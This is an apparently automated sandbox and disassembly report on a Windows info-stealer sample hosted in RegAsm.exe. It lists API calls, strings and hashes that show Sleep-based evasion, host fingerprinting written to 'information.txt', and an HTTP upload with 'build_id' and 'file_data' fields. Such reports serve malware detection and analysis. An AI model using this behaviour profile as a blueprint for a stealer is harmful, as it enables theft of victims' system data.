                                                    • Sleep.KERNEL32(00000014), ref: 0041A8DD
                                                    • Sleep.KERNEL32(00000014), ref: 0041A8E5
                                                    • Sleep.KERNEL32(00000014), ref: 0041A8ED
                                                    • Sleep.KERNEL32(00000014), ref: 0041A8F5
                                                    • Sleep.KERNEL32(00000014), ref: 0041A8FD
                                                    • Sleep.KERNEL32(00000014), ref: 0041A905
                                                    • Sleep.KERNEL32(00000014), ref: 0041A90D
                                                    • Sleep.KERNEL32(00000014,00425200), ref: 0041A922
                                                    • Sleep.KERNEL32(00000014), ref: 0041A92A
                                                    • Sleep.KERNEL32(00000014), ref: 0041A932
                                                    • Sleep.KERNEL32(00000014), ref: 0041A93A
                                                    • Sleep.KERNEL32(00000014), ref: 0041A942
                                                    • Sleep.KERNEL32(00000014), ref: 0041A94A
                                                    • Sleep.KERNEL32(00000014,00000000,?,?,00428E5C,?,00000000), ref: 0041A9A6
                                                    • Sleep.KERNEL32(00000014), ref: 0041A9AE
                                                    • Sleep.KERNEL32(00000014), ref: 0041A9B6
                                                    • Sleep.KERNEL32(00000014), ref: 0041A9BE
                                                    • Sleep.KERNEL32(00000014), ref: 0041A9C6
                                                    • Sleep.KERNEL32(00000014), ref: 0041A9CE
                                                    • Sleep.KERNEL32(00000014), ref: 0041A9D6
                                                    • Sleep.KERNEL32(00000014), ref: 0041A9DE
                                                    • Sleep.KERNEL32(00000014), ref: 0041A9E6
                                                    • Sleep.KERNEL32(00000014), ref: 0041A9EE
                                                    • Sleep.KERNEL32(00000014), ref: 0041A9F6
                                                    • Sleep.KERNEL32(00000014), ref: 0041A9FE
                                                    • Sleep.KERNEL32(00000014), ref: 0041AA0F
                                                    • Sleep.KERNEL32(00000014), ref: 0041AA17
                                                    • Sleep.KERNEL32(00000014), ref: 0041AA1F
                                                    • Sleep.KERNEL32(00000014), ref: 0041AA27
                                                    • Sleep.KERNEL32(00000014), ref: 0041AA2F
                                                    • Sleep.KERNEL32(00000014), ref: 0041AA37
                                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 0041AA4D
                                                    • Sleep.KERNEL32(00000014), ref: 0041AA5E
                                                    • Sleep.KERNEL32(00000014), ref: 0041AA66
                                                    • Sleep.KERNEL32(00000014), ref: 0041AA6E
                                                    • Sleep.KERNEL32(00000014), ref: 0041AA76
                                                    • Sleep.KERNEL32(00000014), ref: 0041AA7E
                                                    • Sleep.KERNEL32(00000014), ref: 0041AA86
                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041AA9B
                                                    • Sleep.KERNEL32(00000014), ref: 0041AAA6
                                                    • Sleep.KERNEL32(00000014), ref: 0041AAAE
                                                    • Sleep.KERNEL32(00000014), ref: 0041AAB6
                                                    • Sleep.KERNEL32(00000014), ref: 0041AABE
                                                    • Sleep.KERNEL32(00000014), ref: 0041AAC6
                                                    • Sleep.KERNEL32(00000014), ref: 0041AACE
                                                    • Sleep.KERNEL32(00000014), ref: 0041AADA
                                                    • Sleep.KERNEL32(00000014), ref: 0041AAE2
                                                    • Sleep.KERNEL32(00000014), ref: 0041AAEA
                                                    • Sleep.KERNEL32(00000014), ref: 0041AAF2
                                                    • Sleep.KERNEL32(00000014), ref: 0041AAFA
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB02
                                                    • CloseHandle.KERNEL32(00000000), ref: 0041AB0B
                                                    • Sleep.KERNEL32(00001B58), ref: 0041AB16
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB1E
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB26
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB2E
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB36
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB3E
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB46
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB53
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB5B
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB63
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB6B
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB73
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB7B
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB83
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB8B
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB93
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB9B
                                                    • Sleep.KERNEL32(00000014), ref: 0041ABA3
                                                    • Sleep.KERNEL32(00000014), ref: 0041ABAB
                                                    • Sleep.KERNEL32(00000014), ref: 0041ABB8
                                                    • Sleep.KERNEL32(00000014), ref: 0041ABC0
                                                    • Sleep.KERNEL32(00000014), ref: 0041ABC8
                                                    • Sleep.KERNEL32(00000014), ref: 0041ABD0
                                                    • Sleep.KERNEL32(00000014), ref: 0041ABD8
                                                    • Sleep.KERNEL32(00000014), ref: 0041ABE0
                                                    • Sleep.KERNEL32(00000014), ref: 0041ABE8
                                                    • Sleep.KERNEL32(00000014), ref: 0041ABF0
                                                    • Sleep.KERNEL32(00000014), ref: 0041ABF8
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC00
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC08
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC10
                                                    • CloseHandle.KERNEL32(?), ref: 0041AC19
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC21
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC29
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC31
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC39
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC41
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC49
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC51
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC59
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC61
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC69
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC71
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC79
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC81
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC89
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC91
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC99
                                                    • Sleep.KERNEL32(00000014), ref: 0041ACA1
                                                    • Sleep.KERNEL32(00000014), ref: 0041ACA9
                                                    • ExitProcess.KERNEL32 ref: 0041ACB1
                                                    Strings
                                                    • Oregon Ballot Measure 56 or House Joint Resolution 15 (HJR 15) is a legislatively referred constitutional amendment that enacted l, xrefs: 0041A787, 0041A828
                                                    • GetSystemTime, xrefs: 0041A7CF
                                                    • Taxonomic sequence (also known as systematic, phyletic or taxonomic order) is a sequence followed in listing of taxa which aids ea, xrefs: 0041A771, 0041A812
                                                    • The 1967 October Revolution Parade is the parade on Moscow's Red Square devoted to the 50th anniversary of the Great October Socia, xrefs: 0041A792, 0041A833
                                                    • The 1999 Rushmoor Council election took place on 6 May 1999 to elect members of Rushmoor Borough Council in Hampshire, England. On, xrefs: 0041A77C, 0041A81D
                                                    • Sleep, xrefs: 0041A7BC
                                                    • kernel32.dll, xrefs: 0041A7A8
                                                    • I-11 was an Imperial Japanese Navy Type A1 submarine that served during World War II. Designed as a submarine aircraft carrier and, xrefs: 0041A79D, 0041A83E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Similarity
                                                    • API ID: Sleep$lstrlen$AddressCloseEventHandleProclstrcpy$CreateExitLibraryLoadOpenProcesslstrcat
                                                    • String ID: GetSystemTime$I-11 was an Imperial Japanese Navy Type A1 submarine that served during World War II. Designed as a submarine aircraft carrier and$Oregon Ballot Measure 56 or House Joint Resolution 15 (HJR 15) is a legislatively referred constitutional amendment that enacted l$Sleep$Taxonomic sequence (also known as systematic, phyletic or taxonomic order) is a sequence followed in listing of taxa which aids ea$The 1967 October Revolution Parade is the parade on Moscow's Red Square devoted to the 50th anniversary of the Great October Socia$The 1999 Rushmoor Council election took place on 6 May 1999 to elect members of Rushmoor Borough Council in Hampshire, England. On$kernel32.dll
                                                    • API String ID: 1968030747-1157189060
                                                    • Opcode ID: 54532dd25730401e9619ccf941eb7a63a5c16019b915d8d70357fc5f908c5c95
                                                    • Instruction ID: d0fc9c7f70cd4d74f070b5276f1611ca398b8472acf39be3ffb0404d49fc07f7
                                                    • Opcode Fuzzy Hash: 54532dd25730401e9619ccf941eb7a63a5c16019b915d8d70357fc5f908c5c95
                                                    • Instruction Fuzzy Hash: 40D1AB356E121DEFDB006BE0AC2EBE87A6AAB17702F551125B30E9D0F0DAB444C19F75

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Similarity
                                                    • API ID: Sleep$CloseEventHandle$CreateExitOpenProcess
                                                    • String ID:
                                                    • API String ID: 3990214622-0
                                                    • Opcode ID: 939382f14eacfc35bc189caa75c6057b8e340a7325aef0680f6e940db5972843
                                                    • Instruction ID: 010346d2f35c5d2b6dfb22c7d70376198b9011b0162d7776d674804ad5e558a3
                                                    • Opcode Fuzzy Hash: 939382f14eacfc35bc189caa75c6057b8e340a7325aef0680f6e940db5972843
                                                    • Instruction Fuzzy Hash: AC5157395E620DEFEB006BE09D1EBE83666AB17706F151015B30E9C0F0CA7444C59F36

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 00404373
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 00404387
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 0040439B
                                                      • Part of subcall function 0040430F: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043B9
                                                      • Part of subcall function 0040430F: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043C9
                                                    • lstrlenA.KERNEL32(00000000), ref: 00404E8B
                                                      • Part of subcall function 0041302D: CryptBinaryToStringA.CRYPT32(00000000,00404E7F,40000001,00000000,00000000), ref: 0041304A
                                                    • StrCmpCA.SHLWAPI(?,00425200,00425200,00425200,00425200), ref: 00404EEF
                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F17
                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405025
                                                    • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00400100,00000000), ref: 00405082
                                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004050BA
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                    • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00000000,?,00428D7C,00000000,?,00000000,00000000), ref: 00405579
                                                    • lstrlenA.KERNEL32(00000000), ref: 0040558D
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040559D
                                                    • HeapAlloc.KERNEL32(00000000), ref: 004055A4
                                                    • lstrlenA.KERNEL32(00000000), ref: 004055B9
                                                    • memcpy.MSVCRT ref: 004055CF
                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004055E6
                                                    • memcpy.MSVCRT ref: 004055F3
                                                    • lstrlenA.KERNEL32(00000000), ref: 00405604
                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 0040561D
                                                    • memcpy.MSVCRT ref: 0040562D
                                                    • lstrlenA.KERNEL32(00000000,?,?), ref: 00405647
                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 0040565A
                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0040568D
                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405730
                                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 004057A1
                                                    • ExitProcess.KERNEL32 ref: 004057AD
                                                    • InternetCloseHandle.WININET(00000000), ref: 00405824
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$Internet$lstrcpy$Httpmemcpy$HeapOpenProcessRequestlstrcat$AllocBinaryCloseConnectCrackCryptExitFileHandleInfoOptionQueryReadSendString
                                                    • String ID: ------$"$--$------$ERROR$block$build_id$file_data
                                                    • API String ID: 291296625-1063948816
                                                    • Opcode ID: 941268b52b4c2f1080921e961083cd3901daec87e8b66a8e899ed6db65051c96
                                                    • Instruction ID: 347b2e4d89f66f0c0c6539a9aa54472735362a414d5b47530b2be4bc622c77f0
                                                    • Opcode Fuzzy Hash: 941268b52b4c2f1080921e961083cd3901daec87e8b66a8e899ed6db65051c96
                                                    • Instruction Fuzzy Hash: 76520E729101189ADB14FBA1EC96FDE7379AF15305F5080AAF216B21F1DF386A88CF54

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    APIs
                                                    • GetProcAddress.KERNEL32 ref: 0041AD54
                                                    • GetProcAddress.KERNEL32 ref: 0041AD6B
                                                    • GetProcAddress.KERNEL32 ref: 0041AD82
                                                    • GetProcAddress.KERNEL32 ref: 0041AD99
                                                    • GetProcAddress.KERNEL32 ref: 0041ADB0
                                                    • GetProcAddress.KERNEL32 ref: 0041ADC7
                                                    • GetProcAddress.KERNEL32 ref: 0041ADDE
                                                    • GetProcAddress.KERNEL32 ref: 0041ADF5
                                                    • GetProcAddress.KERNEL32 ref: 0041AE0C
                                                    • GetProcAddress.KERNEL32 ref: 0041AE23
                                                    • GetProcAddress.KERNEL32 ref: 0041AE3A
                                                    • GetProcAddress.KERNEL32 ref: 0041AE51
                                                    • GetProcAddress.KERNEL32 ref: 0041AE68
                                                    • GetProcAddress.KERNEL32 ref: 0041AE7F
                                                    • GetProcAddress.KERNEL32 ref: 0041AE96
                                                    • GetProcAddress.KERNEL32 ref: 0041AEAD
                                                    • GetProcAddress.KERNEL32 ref: 0041AEC4
                                                    • GetProcAddress.KERNEL32 ref: 0041AEDB
                                                    • GetProcAddress.KERNEL32 ref: 0041AEF2
                                                    • GetProcAddress.KERNEL32 ref: 0041AF09
                                                    • GetProcAddress.KERNEL32 ref: 0041AF20
                                                    • LoadLibraryA.KERNEL32(?,0041A8B3), ref: 0041AF31
                                                    • LoadLibraryA.KERNEL32(?,0041A8B3), ref: 0041AF42
                                                    • LoadLibraryA.KERNEL32(?,0041A8B3), ref: 0041AF53
                                                    • LoadLibraryA.KERNEL32(?,0041A8B3), ref: 0041AF64
                                                    • LoadLibraryA.KERNEL32(?,0041A8B3), ref: 0041AF75
                                                    • GetProcAddress.KERNEL32(?,0041A8B3), ref: 0041AF95
                                                    • GetProcAddress.KERNEL32(?,0041A8B3), ref: 0041AFB5
                                                    • GetProcAddress.KERNEL32(?,0041A8B3), ref: 0041AFCC
                                                    • GetProcAddress.KERNEL32(?,0041A8B3), ref: 0041AFEC
                                                    • GetProcAddress.KERNEL32(?,0041A8B3), ref: 0041B00C
                                                    • GetProcAddress.KERNEL32(?,0041A8B3), ref: 0041B02C
                                                    • GetProcAddress.KERNEL32(?,0041A8B3), ref: 0041B043
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad
                                                    • String ID:
                                                    • API String ID: 2238633743-0
                                                    • Opcode ID: 8ed0b4f8c3e954e1fc1dc6971364bbe040f0f26000e4905d9b82ffd922f5bdfa
                                                    • Instruction ID: e6d1e2ba0aaa9db7fee79aa5ca47b6abfb0ed3e486351d87d65decbaef8ebfc5
                                                    • Opcode Fuzzy Hash: 8ed0b4f8c3e954e1fc1dc6971364bbe040f0f26000e4905d9b82ffd922f5bdfa
                                                    • Instruction Fuzzy Hash: DD81C679481214EFEB026F60FE19AA43FA3F70B345715712AE90689670E77648A8EF40

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 00411C63: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,Version: ,00425200), ref: 00411C70
                                                      • Part of subcall function 00411C63: HeapAlloc.KERNEL32(00000000), ref: 00411C77
                                                      • Part of subcall function 00411C63: GetLocalTime.KERNEL32(?), ref: 00411C84
                                                      • Part of subcall function 00411C63: wsprintfA.USER32 ref: 00411CB1
                                                      • Part of subcall function 004125CA: memset.MSVCRT ref: 004125F2
                                                      • Part of subcall function 004125CA: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 00412612
                                                      • Part of subcall function 004125CA: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00412639
                                                      • Part of subcall function 004125CA: CharToOemA.USER32(00000000,?), ref: 00412659
                                                      • Part of subcall function 00412667: GetCurrentHwProfileA.ADVAPI32(?), ref: 00412674
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 00411948: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00411964
                                                      • Part of subcall function 00411948: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004119A1
                                                      • Part of subcall function 00411948: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411A18
                                                      • Part of subcall function 00411948: HeapAlloc.KERNEL32(00000000), ref: 00411A1F
                                                    • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,00428FE4,00000000,?,00000000,00000000,?,HWID: ,00000000,?,00428E48,00000000), ref: 00415497
                                                      • Part of subcall function 00413563: OpenProcess.KERNEL32(00000410,00000000,004154AA), ref: 00413576
                                                      • Part of subcall function 00413563: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00413596
                                                      • Part of subcall function 00413563: CloseHandle.KERNEL32(00000000), ref: 0041359F
                                                      • Part of subcall function 00411ADD: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411AF1
                                                      • Part of subcall function 00411ADD: HeapAlloc.KERNEL32(00000000), ref: 00411AF8
                                                      • Part of subcall function 004127AF: CoInitializeEx.OLE32(00000000,00000000,?,?,?,?,00428E48,00000000,?,00000000,00000000,?,Windows: ,00000000,?,00428FE4), ref: 004127D9
                                                      • Part of subcall function 004127AF: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00428E48,00000000,?), ref: 004127F1
                                                      • Part of subcall function 004127AF: CoCreateInstance.OLE32(0042AE78,00000000,00000001,0042ADA8,00000000,?,?,?,?,00428E48,00000000,?,00000000,00000000,?,Windows: ), ref: 0041280D
                                                      • Part of subcall function 004127AF: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,?,?,00428E48,00000000,?,00000000), ref: 00412855
                                                      • Part of subcall function 004129BF: CoInitializeEx.OLE32(00000000,00000000,?,?,?,Windows: ,00000000,?,00428FE4,00000000,?,Work Dir: In memory,00000000,?,00428E48,00000000), ref: 004129E9
                                                      • Part of subcall function 004129BF: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,Windows: ,00000000,?,00428FE4), ref: 00412A01
                                                      • Part of subcall function 004129BF: CoCreateInstance.OLE32(0042AE78,00000000,00000001,0042ADA8,00000000,?,?,?,Windows: ,00000000,?,00428FE4,00000000,?), ref: 00412A1D
                                                      • Part of subcall function 004129BF: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,?,Windows: ,00000000,?,00428FE4,00000000), ref: 00412A65
                                                      • Part of subcall function 00411C21: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00415711,00000000,?,Computer Name: ,00000000,?,00428E48,00000000,?,00000000,00000000), ref: 00411C2D
                                                      • Part of subcall function 00411C21: HeapAlloc.KERNEL32(00000000,?,?,?,00415711,00000000,?,Computer Name: ,00000000,?,00428E48,00000000,?,00000000,00000000,?), ref: 00411C34
                                                      • Part of subcall function 00411C21: GetComputerNameA.KERNEL32(00000000,00000104), ref: 00411C4B
                                                      • Part of subcall function 00411BEC: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0041A955), ref: 00411BF8
                                                      • Part of subcall function 00411BEC: HeapAlloc.KERNEL32(00000000,?,?,?,0041A955), ref: 00411BFF
                                                      • Part of subcall function 00411BEC: GetUserNameA.ADVAPI32(?,00000104), ref: 00411C16
                                                      • Part of subcall function 0041254A: CreateDCA.GDI32(00000000,00000000,00000000,?), ref: 0041255C
                                                      • Part of subcall function 0041254A: GetDeviceCaps.GDI32(?,00000008), ref: 0041256A
                                                      • Part of subcall function 0041254A: GetDeviceCaps.GDI32(?,0000000A), ref: 00412578
                                                      • Part of subcall function 0041254A: ReleaseDC.USER32(00000000,?), ref: 00412586
                                                      • Part of subcall function 0041254A: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00412593
                                                      • Part of subcall function 0041254A: HeapAlloc.KERNEL32(00000000), ref: 0041259A
                                                      • Part of subcall function 0041254A: wsprintfA.USER32 ref: 004125B1
                                                      • Part of subcall function 00411D31: GetKeyboardLayoutList.USER32(00000000,00000000,00425200), ref: 00411D59
                                                      • Part of subcall function 00411D31: LocalAlloc.KERNEL32(00000040,?), ref: 00411D71
                                                      • Part of subcall function 00411D31: GetKeyboardLayoutList.USER32(?,00000000), ref: 00411D83
                                                      • Part of subcall function 00411D31: GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200), ref: 00411DD3
                                                      • Part of subcall function 00411D31: LocalFree.KERNEL32(00000000), ref: 00411E90
                                                      • Part of subcall function 00411CBF: GetProcessHeap.KERNEL32(00000000,00000104,00428E48,00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00428E48,00000000,?,00000000,00000000), ref: 00411CCF
                                                      • Part of subcall function 00411CBF: HeapAlloc.KERNEL32(00000000), ref: 00411CD6
                                                      • Part of subcall function 00411CBF: GetTimeZoneInformation.KERNEL32(?), ref: 00411CE9
                                                      • Part of subcall function 00411EB5: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00411EC9
                                                      • Part of subcall function 00411EB5: HeapAlloc.KERNEL32(00000000), ref: 00411ED0
                                                      • Part of subcall function 00411EB5: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000), ref: 00411EEF
                                                      • Part of subcall function 00411EB5: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,000000FF,000000FF), ref: 00411F0D
                                                      • Part of subcall function 00411F54: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00411F87
                                                      • Part of subcall function 00411F54: GetLastError.KERNEL32 ref: 00411F96
                                                      • Part of subcall function 00411F21: GetSystemInfo.KERNEL32(00000000), ref: 00411F2E
                                                      • Part of subcall function 00411F21: wsprintfA.USER32 ref: 00411F43
                                                      • Part of subcall function 00412081: GetProcessHeap.KERNEL32(00000000,00000104,?,00428E48,00000000,?,00000000,00000000,?,Windows: ,00000000,?,00428FE4,00000000,?,Work Dir: In memory), ref: 0041208E
                                                      • Part of subcall function 00412081: HeapAlloc.KERNEL32(00000000), ref: 00412095
                                                      • Part of subcall function 00412081: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 004120B6
                                                      • Part of subcall function 00412081: __aulldiv.LIBCMT ref: 004120CE
                                                      • Part of subcall function 00412081: __aulldiv.LIBCMT ref: 004120DC
                                                      • Part of subcall function 00412081: wsprintfA.USER32 ref: 004120FF
                                                      • Part of subcall function 0041210D: EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000001), ref: 00412148
                                                      • Part of subcall function 0041246A: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00412491
                                                      • Part of subcall function 0041246A: Process32First.KERNEL32(00000000,00000128), ref: 004124A4
                                                      • Part of subcall function 0041246A: Process32Next.KERNEL32(00000000,00000128), ref: 004124B8
                                                      • Part of subcall function 0041246A: CloseHandle.KERNEL32(00000000), ref: 00412525
                                                      • Part of subcall function 0041218B: RegOpenKeyExA.KERNEL32(00000000,00000000,00020019,00000000,00425200), ref: 004121DE
                                                      • Part of subcall function 0041218B: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00412259
                                                      • Part of subcall function 0041218B: wsprintfA.USER32 ref: 0041228B
                                                      • Part of subcall function 0041218B: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 004122AC
                                                    • lstrlenA.KERNEL32(00000000,00000000,?,00428FE4,00000000,?,00000000,00000000,?,00000000,00000000,?,[Software],00000000,?,00428FE4), ref: 00415DE1
                                                      • Part of subcall function 00418DB9: _MSFOpenExW.MSPDB140-MSVCRT ref: 00418E6C
                                                      • Part of subcall function 00418DB9: CreateThread.KERNEL32(00000000,00000000,00418C65,?,00000000,00000000), ref: 00418E85
                                                      • Part of subcall function 00418DB9: WaitForSingleObject.KERNEL32(?,000003E8), ref: 00418E96
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$Process$Alloc$Open$Createwsprintf$Initializelstrcpy$InformationLocalName$BlanketCapsCloseCurrentDeviceEnumHandleInfoInstanceKeyboardLayoutListProcess32ProxyQuerySecurityTimeValue__aulldivlstrcatlstrlen$CharComputerDevicesDirectoryDisplayErrorFileFirstFreeGlobalLastLocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                    • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                    • API String ID: 4242084749-1014693891
                                                    • Opcode ID: ec29a3163d9d18987f0e179795c7a0416d16bd3ffa26116ace8d5c82db2c5aaf
                                                    • Instruction ID: 98b063b3ea0cf676e7d3c9db5d6b4e855844e07ef84fbbd767ca72325addcb2a
                                                    • Opcode Fuzzy Hash: ec29a3163d9d18987f0e179795c7a0416d16bd3ffa26116ace8d5c82db2c5aaf
                                                    • Instruction Fuzzy Hash: BC629172900118AACB15F7A1DD96DDE7379AF14305F5042AFF226B21B1EF346B88CE58

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 00412D64: GetSystemTime.KERNEL32(00000000,00425200), ref: 00412D8A
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
